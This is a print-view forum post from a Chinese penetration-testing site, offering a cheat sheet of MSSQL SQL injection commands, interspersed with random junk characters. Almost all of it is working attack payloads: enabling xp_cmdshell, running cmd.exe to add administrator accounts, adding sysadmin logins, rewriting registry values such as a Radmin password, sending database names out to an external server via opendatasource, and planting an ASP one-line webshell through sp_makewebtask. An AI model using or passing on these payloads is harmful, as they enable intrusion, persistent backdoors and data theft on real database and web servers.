中国网络渗透测试联盟

标题: 常用的一些注入命令 [打印本页]
作者: admin    时间: 2012-9-15 14:40
标题: 常用的一些注入命令
//看看是什么权限的
& E4 ?$ h7 d; t: ?" K% d! oand 1=(Select IS_MEMBER('db_owner'))) h/ e6 Y% V4 s2 M6 E# \
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--% V7 ?- [0 N7 O9 g* d

5 F1 i( S  P: B) _; f3 Q- M) f//检测是否有读取某数据库的权限& I! Z; F3 y. K, I7 |+ X
and 1= (Select HAS_DBACCESS('master'))" ~! W: k. S" b! f& X% @
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
/ d% N" D4 N& t2 h) e
" n0 n  y# b/ S6 X! D: G7 X7 ~+ g- r# P+ d+ d2 U- O
数字类型5 `9 e) j% _# K& m2 ]
and char(124)%2Buser%2Bchar(124)=0
1 l. I' I1 e# m. X
! e& a  _2 a/ w! V5 Q字符类型
# @, u* b% w$ H, x' and char(124)%2Buser%2Bchar(124)=0 and ''='4 L8 F( B1 ^5 A7 \$ H
7 w/ M, Y& U3 X+ ?) k( X, e
搜索类型8 ~+ y$ \0 E1 r7 A$ P/ a% H
' and char(124)%2Buser%2Bchar(124)=0 and '%'='
5 m+ ~% y6 v$ ]# ?' m) x+ y) n% k; u& X. ]
爆用户名2 ~. ]1 L; {8 [$ {
and user>0, J: A7 B" C7 C
' and user>0 and ''='
! _4 j" H& n6 k
5 U! H  q4 u7 P/ W2 Q$ ^9 I检测是否为SA权限% r: y% T& j1 [$ [$ T8 y& f3 A8 S5 @
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
+ S& H+ p0 T! Q" ZAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
) R" u1 n+ A( e, ^' @
6 ]" g, x+ }4 g# l  S/ C检测是不是MSSQL数据库
* F' b; Z' b4 |% A) m; {$ H0 kand exists (select * from sysobjects);--
! k# t) Z0 T. w+ t- K& S
; l& o' k/ M0 R, H' u检测是否支持多行
; a4 x; K! a% j;declare @d int;--
8 `( s6 S0 G/ Z6 i: [
+ x. V7 c- }7 u2 u6 T+ a- ?恢复 xp_cmdshell- L' l4 R* k$ H) r) X7 \
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
2 K& t7 u" [( I9 ]- }2 d$ `
% i: `7 N: D9 R6 p2 v
% N) M9 w) k0 ?+ gselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')" }. R3 O4 z0 ]' U$ u
2 G4 K; i' v+ }. ]" n) v
//-----------------------
( Z8 \) I7 I% }//       执行命令
& m1 `2 p4 H7 z7 V//-----------------------
  c- T. R( v# V" s6 [首先开启沙盘模式:
) O/ u- }; w; m$ I9 X/ U& ^7 o# qexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
) @$ o- `8 p0 Q! N* K' A" C
6 [7 ^$ O" |" D! ^然后利用jet.oledb执行系统命令
# Q7 l7 K8 L! m4 P; a6 u1 U; lselect * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')0 C' ]# e8 l+ D- Y. Z% J/ r2 o/ m- j/ B

9 S: V  p1 A7 e, Y: i% A2 ^/ b执行命令
4 E- h+ d# A0 k) e9 b;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--2 j2 U6 s$ U) ?0 A

2 D) g6 p/ p+ M5 S# X% PEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111', o. P1 H: J$ A

% t- X  F4 i; K: k1 I判断xp_cmdshell扩展存储过程是否存在:9 V! j; {, V) {
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')6 h: S3 t! k3 g- X# R4 Q  s8 h

* F5 \9 w$ `) w写注册表
$ \% F5 D9 N: fexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1: ^8 B  G9 p( E8 _* N, X9 s, r" y
) L7 A4 I! H8 h7 K
REG_SZ3 |, x. B2 F2 k6 v- T' d8 C

! ?/ ]; P3 Y( o* n( \2 @! l+ W读注册表7 `, T' z$ I5 ^) A( {! b
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'5 D1 T/ ]5 x6 K9 W

9 ?% r! V2 O% W读取目录内容
! T; p7 c2 N7 q1 B9 q4 Z+ v7 hexec master..xp_dirtree 'c:\winnt\system32\',1,1
% N! R, h8 s/ x$ i4 b4 s* C8 u. e5 p) e

- d1 {* @: A6 E, T. L7 M数据库备份1 x0 V% y! s; U3 v# i
backup database pubs to disk = 'c:\123.bak'# e0 I- W  \1 |* f# T
/ v: [2 g7 F: z- H" I; o& _! x7 Y
//爆出长度
& m' y" z: M- {  ?- ?$ _1 gAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
5 Y- p  f& w: H8 l7 x9 f' d( ^
- A$ Q' Y! M# m% t; y1 I7 n
4 z$ D# x& i. O. I' k' q
1 B" o8 k. d# d: b% g5 y9 d更改sa口令方法:用sql综合利用工具连接后,执行命令:7 X; c& o, |( Z8 V( V$ j! Q
exec sp_password NULL,'新密码','sa'
' @. q5 P4 |/ j! s" h1 W  d7 z" ~; A% n7 t4 k2 q% w
添加和删除一个SA权限的用户test:  l, J9 o4 v: B9 U4 ?# V) W
exec master.dbo.sp_addlogin test,9530772
  U5 B* ^! ~3 Z- f* M! @exec master.dbo.sp_addsrvrolemember test,sysadmin
" c$ `. Y) I8 m1 y2 D! C
# Q! \8 Q' t3 _$ \9 V; ^删除扩展存储过过程xp_cmdshell的语句:
+ Q) O. p7 r3 s% Z; ^+ Gexec sp_dropextendedproc 'xp_cmdshell'0 G( A+ s# d" _9 b' r

0 `$ A0 d5 y) x添加扩展存储过过程* O/ m8 o+ J9 B& B" a( k
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll', t' |: k" b) @1 e( H
GRANT exec On xp_proxiedadata TO public
1 G9 |* u3 S: o% w6 q+ k# e: i! @' L8 s% _5 e# F9 g

9 @, o1 M9 I' r停掉或激活某个服务。" A$ \: ]2 h( h- ]) v# T

" k' c% J: i/ v$ o8 B6 sexec master..xp_servicecontrol 'stop','schedule'+ _$ W! K) Y: l; q1 J, b) I
exec master..xp_servicecontrol 'start','schedule'
6 _, W1 I9 i. t8 \7 I' E& m- q: J9 D5 V
dbo.xp_subdirs/ f3 u# m& P5 c* r# F" g9 L. W
5 N$ n* V; {* f2 b# N
只列某个目录下的子目录。# n. Q& z9 Y/ @% @  M3 C$ {
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'2 ]- Q4 U" ^! }/ t4 K+ n
2 G% l. Y1 K0 |9 z
dbo.xp_makecab/ H( i1 Z: {; ^( D, t" I

! Z1 {! q6 w% ~) c9 O8 P将目标多个档案压缩到某个目标档案之内。. w) B3 c5 p- b  {6 {- ]
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。5 W" Y, F* w: w4 ^: I& r( h
' t' d; l1 b& N5 c$ u
dbo.xp_makecab8 Z6 _5 \: ^6 F& S, b9 [& U8 s/ |2 ~
'c:\test.cab','mszip',1,
# x) s3 a% @- ~'C:\Inetpub\wwwroot\SQLInject\login.asp',1 L7 y* m- M% ^8 v) H5 Y+ O
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
- _" V+ F, H8 ], b5 P
$ R9 J- }# }0 \+ C+ O; @xp_terminate_process7 b3 b5 U; o7 d" i) J1 w  ~

$ ^' T$ H! J" \8 k4 G( C停掉某个执行中的程序,但赋予的参数是 Process ID。
) Z8 h9 T- D" W$ [3 y利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID; [/ g8 m8 ]! X$ _) b
4 h$ U* d8 d. j4 b! f! e) g! P
xp_terminate_process 2484/ a, Q) q: @/ B: ]  p

* N7 x  ]% \; O; Jxp_unpackcab
4 X. P/ K; d. j3 T) V# I
8 Q+ |6 K. Y' d1 _- p, \, l8 _解开压缩档。* j9 ~1 m0 D- I
9 x! p0 k! ^( ~
xp_unpackcab 'c:\test.cab','c:\temp',1
3 `/ B7 D/ T2 R, y
" A" E( d4 F9 B; b1 M* l% ^3 Q+ W" u. K2 w3 M! Z+ j. d
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
0 [3 [* e! ?1 Y8 Q8 ^$ N
5 y5 N, R6 [6 e( ~7 p9 B3 mcreate database lcx;
( `+ f' E8 i  m% y4 m" H: uCreate TABLE ku(name nvarchar(256) null);
" X% V8 B( z- s: u* q, xCreate TABLE biao(id int NULL,name nvarchar(256) null);! a% p# F" ?+ ?- \! p

  I+ E8 q2 h: k$ b+ a* m) t1 k//得到数据库名
- z" q3 w+ o2 ?4 g# }# Y9 d! h* tinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
$ k' U: N. _. Y) K1 c; a0 H$ L% N4 u  H+ y7 Q0 K# w) L& b9 u

& X: b% p6 c% M+ k//在Master中创建表,看看权限怎样! y- {9 M% k/ s9 @: A) Q
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--9 O) ]/ C( X2 k* B4 Z# w. H; O

5 `, ], R, t2 f& h* _/ c% V- N用 sp_makewebtask直接在web目录里写入一句话马:/ h' A0 o/ r  X3 R% y
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--" J0 |3 N, ~" ^' a* a
, K2 a) c) F- n; [$ w* e+ O8 r
//更新表内容+ A% N/ J: ^  d' m4 }9 ]% v
Update films SET kind = 'Dramatic' Where id = 1234 a1 G2 u' r, z7 P" c

6 h* F$ `; y) o" y$ L//删除内容2 {9 P; y- M  _+ j
delete from table_name where Stockid = 3



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2